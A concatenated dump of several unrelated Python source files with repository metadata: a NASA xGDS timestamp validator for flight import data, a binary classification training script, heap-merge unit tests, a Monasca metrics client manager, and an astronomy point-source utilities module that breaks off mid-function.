# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# __END_LICENSE__
"""
Utilities for validating timestamps in import files
"""
import sys
import yaml
import os
import re
import datetime
import pytz
from PNGinfo import PNGinfo
import PIL.Image
import PIL.ExifTags
from csv import DictReader
from dateutil.parser import parse as dateparser
def get_timestamp_from_filename(filename, time_format, regex=None):
"""
Returns a utz timezone aware time parsed from the filename given the time format & regex
:param filename: the actual filename to parse for time
:param time_format: seconds, microseconds or dateparser
:param regex: The last pattern matched in the regex should hold the time
:return: time
"""
# Some filenames contain float seconds, some int microseconds
result = None
if time_format == 'seconds':
timestamp_pattern = '(\d{10}\.\d{4,10})'
match = re.search(timestamp_pattern, filename)
if match:
timestamp_string = match.groups()[-1]
result = datetime.datetime.utcfromtimestamp(float(timestamp_string)).replace(tzinfo=pytz.UTC)
else:
raise ValueError('Could not find expected time string in %s' % filename)
elif time_format == 'microseconds':
timestamp_pattern = '(\d{16})'
match = re.search(timestamp_pattern, filename)
if match:
timestamp_string = match.groups()[-1]
result = datetime.datetime.utcfromtimestamp(1e-6 * int(timestamp_string)).replace(tzinfo=pytz.UTC)
else:
raise ValueError('Could not find expected time string in %s' % filename)
elif time_format == 'dateparser':
if regex:
timestamp_pattern = regex
match = re.search(timestamp_pattern, filename)
if match:
if regex.count('(') == 2:
timestamp_string = match.group(1) + match.group(2)
else:
timestamp_string = match.groups()[-1]
zoneless_timestamp = dateparser(timestamp_string)
result = pytz.utc.localize(zoneless_timestamp)
else:
raise ValueError('Could not find expected time string in %s' % filename)
else:
raise ValueError('dateparser configuration requires regex: %s' % filename)
else:
raise ValueError('invalid type for filename timestamp: %s' % time_format)
return result
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser('usage: %prog [options] <source_root_dir_for_flight>')
parser.add_option('-c', '--configfile',
help='yaml config file for getting timestamps from files')
parser.add_option('-t', '--test',
action='store_true', default=False,
help='Run in test mode')
parser.add_option('-f', '--force',
action='store_true', default=False,
help='Force creation of a flight even if invalid timestamps are found')
parser.add_option('-m', '--make_flight',
action='store_true', default=False,
help='Create a flight for the given directory')
parser.add_option('-p', '--plot',
action='store_true', default=False,
help='Plot results to pdf, filename uses the import directory name')
parser.add_option('-q', '--quiet',
action='store_true', default=False,
help='Silence most printouts, only include times')
parser.add_option('-d', '--dirname_pattern', default=None,
help='pattern regex for dirname matching')
opts, args = parser.parse_args()
if len(args)<1:
parser.print_help()
sys.exit(0)
global QUIET
QUIET = opts.quiet
# the top level directory should contain all the data for a flight
flight_dir = args[0]
print 'flight_dir: %s' % flight_dir
# just the final directory name, not the full path to it
# have to accommodate the path ending in '/' or not
basename = os.path.basename(os.path.normpath(flight_dir))
print 'basename: %s' % basename
# Get start time from root directory
start_time = None
if opts.dirname_pattern:
start_time = get_timestamp_from_dirname(flight_dir, opts.dirname_pattern)
if start_time is None:
print 'ERROR: Expected the source root to be in the form %s' % opts.dirname_pattern
raise ValueError('Cannot get a valid timestamp from source root %s' % flight_dir)
if not QUIET:
print 'Flight dir timestamp is %s' % start_time
# If we were given a timestamp validation config, go validate timestamps for all data
if opts.configfile is not None:
validator = TimestampValidator(opts.configfile)
validator.find_files(flight_dir)
if not opts.test:
validator.process_files()
if not QUIET:
validator.print_stats()
timestamps = [t[1] for t in validator.timestamps]
first_data_time = min(timestamps)
last_data_time = max(timestamps)
print 'Timestamps for', basename
if start_time:
print 'start time: ', start_time
print 'first data time:', first_data_time
print 'last data time: ', last_data_time
if start_time:
for name, timestamp in validator.timestamps:
if timestamp < start_time:
print 'Error: %s in %s is before start time %s' % (timestamp, name, start_time)
# If we were asked to create a flight, create it
# Note that we cannot make a flight with an end time if we didn't get a config
if opts.make_flight:
try:
# get or create a flight for that source root directory
import django
django.setup()
from django.conf import settings
from xgds_core.flightUtils import get_or_create_flight_with_source_root
dirname = os.path.basename(os.path.normpath(flight_dir))
suffix = dirname[dirname.find('_'):]
local_start_time = start_time.astimezone(pytz.timezone(settings.TIME_ZONE))
name = '%s%s' % (local_start_time.strftime('%Y%m%d'), suffix)
flight = get_or_create_flight_with_source_root(flight_dir, start_time, last_data_time, name)
print 'Created or got flight %s' % flight
except ImportError as e:
print 'Error: Cannot create a flight'
print e
# If we were asked to make a plot, make it
if opts.plot:
pdffile = 'timestamps_%s.pdf' % basename
print 'plotting to', pdffile
validator.plot_times(pdffile)
| 42.287841 | 121 | 0.597054 | #!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# __END_LICENSE__
"""
Utilities for validating timestamps in import files
"""
import sys
import yaml
import os
import re
import datetime
import pytz
from PNGinfo import PNGinfo
import PIL.Image
import PIL.ExifTags
from csv import DictReader
from dateutil.parser import parse as dateparser
def get_timestamp_from_filename(filename, time_format, regex=None):
"""
Returns a utz timezone aware time parsed from the filename given the time format & regex
:param filename: the actual filename to parse for time
:param time_format: seconds, microseconds or dateparser
:param regex: The last pattern matched in the regex should hold the time
:return: time
"""
# Some filenames contain float seconds, some int microseconds
result = None
if time_format == 'seconds':
timestamp_pattern = '(\d{10}\.\d{4,10})'
match = re.search(timestamp_pattern, filename)
if match:
timestamp_string = match.groups()[-1]
result = datetime.datetime.utcfromtimestamp(float(timestamp_string)).replace(tzinfo=pytz.UTC)
else:
raise ValueError('Could not find expected time string in %s' % filename)
elif time_format == 'microseconds':
timestamp_pattern = '(\d{16})'
match = re.search(timestamp_pattern, filename)
if match:
timestamp_string = match.groups()[-1]
result = datetime.datetime.utcfromtimestamp(1e-6 * int(timestamp_string)).replace(tzinfo=pytz.UTC)
else:
raise ValueError('Could not find expected time string in %s' % filename)
elif time_format == 'dateparser':
if regex:
timestamp_pattern = regex
match = re.search(timestamp_pattern, filename)
if match:
if regex.count('(') == 2:
timestamp_string = match.group(1) + match.group(2)
else:
timestamp_string = match.groups()[-1]
zoneless_timestamp = dateparser(timestamp_string)
result = pytz.utc.localize(zoneless_timestamp)
else:
raise ValueError('Could not find expected time string in %s' % filename)
else:
raise ValueError('dateparser configuration requires regex: %s' % filename)
else:
raise ValueError('invalid type for filename timestamp: %s' % time_format)
return result
class TimestampValidator:
def __init__(self, config_yaml_path):
# config comes from a YAML file
self.config = yaml.load(open(config_yaml_path))
self.registry = self.config['registry']
# Local copy of processed files, which are also tracked in the database
# in order to keep state when the import finder is restarted and for
# reporting import status to users
self.processed_files = []
self.files_to_process = []
# Keep track of the disposition of all discovered files:
self.ignored_files = [] # matched an explicit ignore rule
self.ambiguous_files = [] # matched more than one config rule
self.unmatched_files = [] # matched no config rule
self.timestamps_that_failed = [] # tried to import and failed
self.timestamps_that_succeeded = [] # tried and succeeded
# The actual timestamps
self.timestamps = []
def find_files(self, root_dir):
for dirName, subdirList, fileList in os.walk(root_dir):
# print('Found directory: %s' % dirName)
for basename in fileList:
filename = os.path.join(dirName, basename)
# Identify which importer to use, and make sure it's a unique match
matches = []
for r in self.registry:
#print r['filepath_pattern']
match = re.search(r['filepath_pattern'], filename)
if match:
matches.append(r)
if 1 == len(matches):
if 'ignore' in matches[0] and matches[0]['ignore']:
# matched an explicit ignore rule
if not QUIET:
print 'Ignoring', basename
self.ignored_files.append(filename)
continue
if not QUIET:
print 'Adding', basename
# unique match, add to the list of things to import
self.files_to_process.append((filename, matches[0]))
elif 0 == len(matches):
if not QUIET:
print 'Warning: file %s does not match any importer config' % filename
self.unmatched_files.append(filename)
else:
if not QUIET:
print 'Warning: file %s matches more than one importer config' % filename
for m in matches:
print m
self.ambiguous_files.append(filename)
if not QUIET:
print 'Identified files to process:'
for item in self.files_to_process:
filename = item[0]
registry = item[1]
if not QUIET:
print '%s' % (filename)
def process_files(self, username=None, password=None):
for pair in self.files_to_process:
filename, registry = pair
if 'from' in registry:
if registry['from'] == 'filename':
self.get_timestamp_from_filename(filename, registry)
elif registry['from'] == 'csv':
self.get_timestamps_from_csv(filename, registry)
elif registry['from'] == 'exif':
self.get_timestamp_from_exif(filename, registry)
elif registry['from'] == 'doc':
self.get_timestamp_from_doc(filename, registry)
elif registry['from'] == 'text':
# TODO IMPLEMENT for example for html parsing
pass
else:
raise ValueError('Invalid from argument: %s' % registry['from'])
def get_timestamp_from_filename(self, full_filename, registry):
# Some filenames contain float seconds, some int microseconds
filename = os.path.basename(full_filename)
format = registry['format']
regex = None
if 'regex' in registry:
regex = registry['regex']
timestamp = get_timestamp_from_filename(filename, format, regex)
self.timestamps.append(('%s: %s' % (registry['name'], filename), timestamp))
def get_timestamps_from_csv(self, filename, registry):
delimiter = ','
if 'delimiter' in registry:
delimiter_string = registry['delimiter']
if len(delimiter_string) > 1:
if 't' in delimiter_string:
delimiter = '\t'
else:
delimiter = delimiter_string
if 'column_number' in registry:
column = '%d' % registry['column_number']
fieldnames = ['%d' % n for n in range(int(column) + 1)]
reader = DictReader(open(filename, 'r'), delimiter=delimiter,
fieldnames=fieldnames)
else:
column = registry['column_name']
reader = DictReader(open(filename, 'r'), delimiter=delimiter)
for row in reader:
timestamp_string = row[column]
if timestamp_string:
if registry['format'] == 'seconds':
timestamp = datetime.datetime.utcfromtimestamp(float(timestamp_string)).replace(tzinfo=pytz.UTC)
elif registry['format'] == 'microseconds':
timestamp = datetime.datetime.utcfromtimestamp(1e-6 * int(timestamp_string)).replace(tzinfo=pytz.UTC)
elif registry['format'] == 'iso8601':
timestamp = dateparser(timestamp_string)
# print 'timezone:', timestamp.tzname()
else:
raise ValueError('Invalid type for csv timestamp: %s' % registry['format'])
self.timestamps.append((registry['name'], timestamp))
def get_timestamp_from_exif(self, filename, registry):
img = PIL.Image.open(filename)
exif_data = img._getexif()
exif = {
PIL.ExifTags.TAGS[k]: v
for k, v in img._getexif().items()
if k in PIL.ExifTags.TAGS
}
# Note there is no timezone info standard defined for EXIF,
# although there is a standard for GPS time in GPSInfo,
# but our robot is in a cave so none of the cameras will have GPSInfo
timestamp = dateparser(exif['DateTimeOriginal']).replace(tzinfo=pytz.utc)
self.timestamps.append((registry['name'], timestamp))
def get_timestamp_from_doc(self, filename, registry):
"""
This supports custom metadata in a png image which includes a date with time.
:param filename:
:param registry:
:return:
"""
info = PNGinfo(filename)
for entry in info.text:
match = re.search('date:(\D+)([\d\-T\:]+)', entry)
if match:
timestamp = dateparser(match.group(2)).astimezone(pytz.utc)
self.timestamps.append((registry['name'], timestamp))
else:
raise ValueError('Cannot parse DOC timestamp')
def print_stats(self):
print 'Found %d files configured to ignore' % len(self.ignored_files)
print 'Found %d ambiguous files, matched more than one config rule' % len(self.ambiguous_files)
print 'Found %d unmatched files, matched no config rule' % len(self.unmatched_files)
if len(self.files_to_process) > 0:
print 'Found %d files to process' % len(self.files_to_process)
def plot_times(self,pdffile):
# Convert list of tuples of source name, timestamp to a dictionary of source name key, timestamp list value
plot_data = {}
for name,timestamp in self.timestamps:
if name not in plot_data.keys():
plot_data[name] = []
plot_data[name].append(timestamp)
# decimate big datasets because otherwise the plot is kinda unmanageable
for k in plot_data.keys():
if len(plot_data[k])>1000:
print 'there were', len(plot_data[k]), k
plot_data[k].sort()
n = len(plot_data[k])/1000
newlist = plot_data[k][0::n]
# just in case we need to see the last one...
newlist.append(plot_data[k][-1])
plot_data[k] = newlist
print 'now there are', len(plot_data[k]), k
import matplotlib as mpl
mpl.use('pdf')
from matplotlib import pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
fig, ax = plt.subplots()
locs = []
labels = []
for idx,name in enumerate(plot_data.keys()):
locs.append(idx)
labels.append(name)
y = [idx]*len(plot_data[name])
x = plot_data[name]
plt.plot(x,y,'o')
plt.yticks(locs,labels)
# ax.format_xdata = mdates.DateFormatter('%Y.%m.%d %H:%M:%S')
myFmt = mdates.DateFormatter('%Y.%m.%d %H:%M:%S')
ax.xaxis.set_major_formatter(myFmt)
ax.margins(0.05)
fig.autofmt_xdate()
fig.tight_layout()
plt.savefig(pdffile)
def get_timestamp_from_dirname(dirname, pattern):
match = re.search(pattern, dirname)
if match:
timestamp = datetime.datetime.utcfromtimestamp(1e-6*int(match.group(1))).replace(tzinfo=pytz.utc)
return timestamp
return None
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser('usage: %prog [options] <source_root_dir_for_flight>')
parser.add_option('-c', '--configfile',
help='yaml config file for getting timestamps from files')
parser.add_option('-t', '--test',
action='store_true', default=False,
help='Run in test mode')
parser.add_option('-f', '--force',
action='store_true', default=False,
help='Force creation of a flight even if invalid timestamps are found')
parser.add_option('-m', '--make_flight',
action='store_true', default=False,
help='Create a flight for the given directory')
parser.add_option('-p', '--plot',
action='store_true', default=False,
help='Plot results to pdf, filename uses the import directory name')
parser.add_option('-q', '--quiet',
action='store_true', default=False,
help='Silence most printouts, only include times')
parser.add_option('-d', '--dirname_pattern', default=None,
help='pattern regex for dirname matching')
opts, args = parser.parse_args()
if len(args)<1:
parser.print_help()
sys.exit(0)
global QUIET
QUIET = opts.quiet
# the top level directory should contain all the data for a flight
flight_dir = args[0]
print 'flight_dir: %s' % flight_dir
# just the final directory name, not the full path to it
# have to accommodate the path ending in '/' or not
basename = os.path.basename(os.path.normpath(flight_dir))
print 'basename: %s' % basename
# Get start time from root directory
start_time = None
if opts.dirname_pattern:
start_time = get_timestamp_from_dirname(flight_dir, opts.dirname_pattern)
if start_time is None:
print 'ERROR: Expected the source root to be in the form %s' % opts.dirname_pattern
raise ValueError('Cannot get a valid timestamp from source root %s' % flight_dir)
if not QUIET:
print 'Flight dir timestamp is %s' % start_time
# If we were given a timestamp validation config, go validate timestamps for all data
if opts.configfile is not None:
validator = TimestampValidator(opts.configfile)
validator.find_files(flight_dir)
if not opts.test:
validator.process_files()
if not QUIET:
validator.print_stats()
timestamps = [t[1] for t in validator.timestamps]
first_data_time = min(timestamps)
last_data_time = max(timestamps)
print 'Timestamps for', basename
if start_time:
print 'start time: ', start_time
print 'first data time:', first_data_time
print 'last data time: ', last_data_time
if start_time:
for name, timestamp in validator.timestamps:
if timestamp < start_time:
print 'Error: %s in %s is before start time %s' % (timestamp, name, start_time)
# If we were asked to create a flight, create it
# Note that we cannot make a flight with an end time if we didn't get a config
if opts.make_flight:
try:
# get or create a flight for that source root directory
import django
django.setup()
from django.conf import settings
from xgds_core.flightUtils import get_or_create_flight_with_source_root
dirname = os.path.basename(os.path.normpath(flight_dir))
suffix = dirname[dirname.find('_'):]
local_start_time = start_time.astimezone(pytz.timezone(settings.TIME_ZONE))
name = '%s%s' % (local_start_time.strftime('%Y%m%d'), suffix)
flight = get_or_create_flight_with_source_root(flight_dir, start_time, last_data_time, name)
print 'Created or got flight %s' % flight
except ImportError as e:
print 'Error: Cannot create a flight'
print e
# If we were asked to make a plot, make it
if opts.plot:
pdffile = 'timestamps_%s.pdf' % basename
print 'plotting to', pdffile
validator.plot_times(pdffile)
| 8,594 | 812 | 46 |
72bb2c26230187e1a179d511d1cac30530eb8e39 | 1,760 | py | Python | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | import bc_utils
from logistic_regression import logistic_regression_2D
from nn_classification import nn_binary_classification_2D
LEARNING_RATE = 0.1
NUM_EPOCHS = 20000
bc_utils.create_output_dir()
results_file = open("output/results.txt", "w")
# Linear data
X_train, Y_train = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_linear_train.png")
X_test, Y_test = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_linear_train.png")
results_file.write("Logistic Regression - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_linear_train.png")
results_file.write("NN Classification - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
# Non-linear data
X_train, Y_train = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_non_linear_train.png")
X_test, Y_test = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_non_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_non_linear_train.png")
results_file.write("Logistic Regression - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_non_linear_train.png")
results_file.write("NN Classification - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
| 51.764706 | 136 | 0.779545 | import bc_utils
from logistic_regression import logistic_regression_2D
from nn_classification import nn_binary_classification_2D
LEARNING_RATE = 0.1
NUM_EPOCHS = 20000
bc_utils.create_output_dir()
results_file = open("output/results.txt", "w")
# Linear data
X_train, Y_train = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_linear_train.png")
X_test, Y_test = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_linear_train.png")
results_file.write("Logistic Regression - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_linear_train.png")
results_file.write("NN Classification - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
# Non-linear data
X_train, Y_train = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_non_linear_train.png")
X_test, Y_test = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_non_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_non_linear_train.png")
results_file.write("Logistic Regression - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_non_linear_train.png")
results_file.write("NN Classification - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
| 0 | 0 | 0 |
42f2f8be9ee122bf8c6dba775ad153ac58a369e2 | 1,965 | py | Python | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .problem_11_1_merge_sorted_files import *
| 25.519481 | 93 | 0.495674 | from unittest import TestCase
from .problem_11_1_merge_sorted_files import *
class TestSolution(TestCase):
def test(self):
test_case = [
[3, 5, 7],
[0, 6, 28],
[0, 6],
]
self.assertEqual([0, 0, 3, 5, 6, 6, 7, 28], solution(test_case))
def test2(self):
test_case = [
[3, 5, 7, 9, 20],
[0, 6, 28, 35],
[1, 2, 3, 4, 55],
]
self.assertEqual([0, 1, 2, 3, 3, 4, 5, 6, 7, 9, 20, 28, 35, 55], solution(test_case))
def testHeap(self):
node1 = Node(3)
node2 = Node(0)
node3 = Node(1)
heap = Heap(node1)
heap.insert(node2)
heap.insert(node3)
self.assertEqual(0, heap.take_top())
def testHeap2(self):
node1 = Node(0)
node2 = Node(1)
node3 = Node(3)
heap = Heap(node1)
heap.insert(node2)
heap.insert(node3)
self.assertEqual(0, heap.take_top())
def testHeap3(self):
node1 = Node(3)
node2 = Node(0)
node3 = Node(1)
heap = Heap(node1)
heap.insert(node2)
heap.insert(node3)
self.assertEqual(0, heap.take_top())
node1 = Node(5)
node2 = Node(6)
node3 = Node(2)
heap.insert(node1)
heap.insert(node2)
heap.insert(node3)
self.assertEqual(1, heap.take_top())
def testHeap4(self):
node1 = Node(3)
node2 = Node(0)
node3 = Node(1)
heap = Heap(node1)
heap.insert(node2)
heap.insert(node3)
node1 = Node(5)
node2 = Node(6)
node3 = Node(2)
heap.insert(node1)
heap.insert(node2)
heap.insert(node3)
pops = []
while True:
currentNode = heap.take_top()
if currentNode is None:
break
pops.append(currentNode)
self.assertEqual([0, 1, 2, 3, 5, 6], pops)
| 1,694 | 8 | 184 |
b2ec114ffc1ddfec726f8b3d6728e9cf8be1776a | 2,122 | py | Python | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 20 | 2015-10-18T02:56:28.000Z | 2020-11-23T20:27:22.000Z | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 1 | 2016-03-09T16:46:09.000Z | 2016-03-09T16:46:09.000Z | monascaclient/v2_0/metrics.py | openstack/python-monascaclient | 7c9a22bd0d408f4cd068863224ef434d7b17086d | [
"Apache-2.0"
] | 17 | 2015-11-16T09:48:26.000Z | 2018-06-23T06:44:44.000Z | # (C) Copyright 2014-2016 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from monascaclient.common import monasca_manager
| 37.22807 | 79 | 0.671536 | # (C) Copyright 2014-2016 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from monascaclient.common import monasca_manager
class MetricsManager(monasca_manager.MonascaManager):
base_url = '/metrics'
def create(self, **kwargs):
"""Create a metric."""
url_str = self.base_url
if 'tenant_id' in kwargs:
url_str = url_str + '?tenant_id=%s' % kwargs['tenant_id']
del kwargs['tenant_id']
data = kwargs['jsonbody'] if 'jsonbody' in kwargs else kwargs
body = self.client.create(url=url_str, json=data)
return body
def list(self, **kwargs):
"""Get a list of metrics."""
return self._list('', 'dimensions', **kwargs)
def list_names(self, **kwargs):
"""Get a list of metric names."""
return self._list('/names', 'dimensions', **kwargs)
def list_measurements(self, **kwargs):
"""Get a list of measurements based on metric definition filters."""
return self._list('/measurements', 'dimensions', **kwargs)
def list_statistics(self, **kwargs):
"""Get a list of measurement statistics based on metric def filters."""
return self._list('/statistics', 'dimensions', **kwargs)
def list_dimension_names(self, **kwargs):
"""Get a list of metric dimension names."""
return self._list('/dimensions/names', **kwargs)
def list_dimension_values(self, **kwargs):
"""Get a list of metric dimension values."""
return self._list('/dimensions/names/values', **kwargs)
| 0 | 1,400 | 23 |
e80b20a433bfec00b8fa603256cdf13fbb80109b | 7,057 | py | Python | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | 1 | 2016-10-20T08:58:01.000Z | 2016-10-20T08:58:01.000Z | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | null | null | null | egf2ps/utils/utils.py | myinxd/egf2ps | d8db6059601a75260231c7e4b92f1e3c991f8a89 | [
"MIT"
] | null | null | null | # Copyright (c) Zhixian MA <zxma_sjtu@qq.com>
# MIT license
"""
Some I/O and processing tools are provied in this utils module.
Methods
-------
reg2mat:
Read point sources list from the region file, and translate it into np.ndarray
mat2reg:
Print PS list matrix to ds9 region files
compare:
Compare detected PS with the references
img2mat:
Read image from the provided path
logManager:
Configure logging style <to be strengthed>
References
------------
[1] scipy.ndimage
http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.
imread.html#scipy.ndimage.imread
"""
import os
import sys
import logging
import numpy as np
import pyregion
from astropy.io import fits
from scipy.ndimage import imread
# Defination of functions
def reg2mat(filename):
"""
Read region files and transform to matrix,the pyregion module is used.
"""
# Init
if os.path.exists(filename):
pslist = pyregion.open(filename)
else:
return 0
# Split and get the numbers
num_ps = len(pslist)
ps = []
for i in range(num_ps):
ps.append(pslist[i].coord_list)
ps = np.array(ps)
return ps
def mat2reg(ps,outfile,pstype = 'elp'):
"""
Transform ps mat to region file
Parameters
----------
ps: np.ndarray
A two dimensional matrix holds the information of point sources
outfile: str
Name of the output file
pstype: str
Type of region, can be 'elp','cir','box'
"""
reg = open(outfile,'w+')
if pstype is 'elp':
for i in range(ps.shape[0]):
ps_str = 'ellipse(' + str(ps[i,0])+','+ str(ps[i,1])+\
','+str(ps[i,2])+','+str(ps[i,3])+','+str(ps[i,4])+')\n'
reg.write(ps_str)
elif pstype is 'cir':
for i in range(ps.shape[0]):
ps_str = 'circle(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+')\n'
reg.write(ps_str)
else:
for i in range(ps.shape[0]):
ps_str = 'box(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+','+str(ps[i,3])+',0)\n'
reg.write(ps_str)
def compare(ps,ps_ref):
"""
Compare detected ps with the real one or reference
Parameters
----------
ps: np.ndarray
Detected point source list
ps_ref: np.ndarray
Referenced point source list
Returns
-------
num_same: int
Number of same PS
cord_x,cord_y: list
Coordinates of the same PS
err_rate: float
Error rate
"""
# Init
num_same = 0
err_rate = 0.0
cord_x = []
cord_y = []
# Extract coordinates of ps and ps_ref
ps_x = ps[:,0].tolist()
ps_y = ps[:,1].tolist()
ps_ref_x = ps_ref[:,0].tolist()
ps_ref_y = ps_ref[:,1].tolist()
# Compare
i = 1
while i <= len(ps_ref_x) - 1:
j = 1
while j <= len(ps_ref_x) - 1:
d = np.sqrt((ps_x[j]-ps_ref_x[i])**2 + (ps_y[j]-ps_ref_y[i])**2)
if d <= 5:
num_same += 1
cord_x.append(ps_x[j])
cord_y.append(ps_y[j])
ps_x.remove(ps_x[j])
ps_y.remove(ps_y[j])
break
j += 1
i += 1
len_ps = ps.shape[0]
err_rate = (abs(len_ps - len(ps_ref_x)) + len(ps_ref_x) - num_same)/ len(ps_ref_x)
return num_same,err_rate,cord_x,cord_y
def img2mat(imgpath):
"""
Load image
Parameter
---------
imgpath: str
path of the image,the image can be fits or other image type files
"""
# Judge type of path
postfix = os.path.splitext(imgpath)[-1]
if postfix == '.fits':
try:
img = fits.open(imgpath)
except IOError:
sys.exit("The image can't be loaded.")
img_mat = img[0].data
else:
try:
img_mat = imread(imgpath,mode='L')
except IOError:
sys.exit("The image can't be loaded.")
img_mat = np.array(img_mat,dtype=float)/255
return img_mat
def cluster(pslist,dist=5,itertime=3):
"""Cluster of potential point sources
Parameter
---------
dist: int
Smallest distance between to point sources to be clustered
itertime: int
Time of iteration
"""
# Init
rowIdx = pslist[:,1].tolist()
colIdx = pslist[:,0].tolist()
rowAxis = pslist[:,3].tolist()
colAxis = pslist[:,2].tolist()
ang = pslist[:,4].tolist()
peaks = pslist[:,5].tolist()
# Clustering
for t in range(itertime):
i = 0
while i <= len(colIdx) - 1:
j = i + 1
xs = colIdx[i]
ys = rowIdx[i]
temp_x = [xs]
temp_y = [ys]
temp_peak = [peaks[i]]
temp_ra = [rowAxis[i]]
temp_ca = [colAxis[i]]
temp_ang = [ang[i]]
while j <= len(colIdx) - 1:
if np.sqrt((xs-colIdx[j])**2+(ys-rowIdx[j])**2)<=dist:
temp_x.append(colIdx[j])
temp_y.append(rowIdx[j])
temp_ra.append(rowAxis[j])
temp_ca.append(colAxis[j])
temp_peak.append(peaks[j])
temp_ang.append(ang[j])
# remove
rowIdx.remove(rowIdx[j])
colIdx.remove(colIdx[j])
rowAxis.remove(rowAxis[j])
colAxis.remove(colAxis[j])
peaks.remove(peaks[j])
ang.remove(ang[j])
# change j
j = j - 1
j = j + 1
# update
rowIdx[i] = round(np.mean(temp_y))
colIdx[i] = round(np.mean(temp_x))
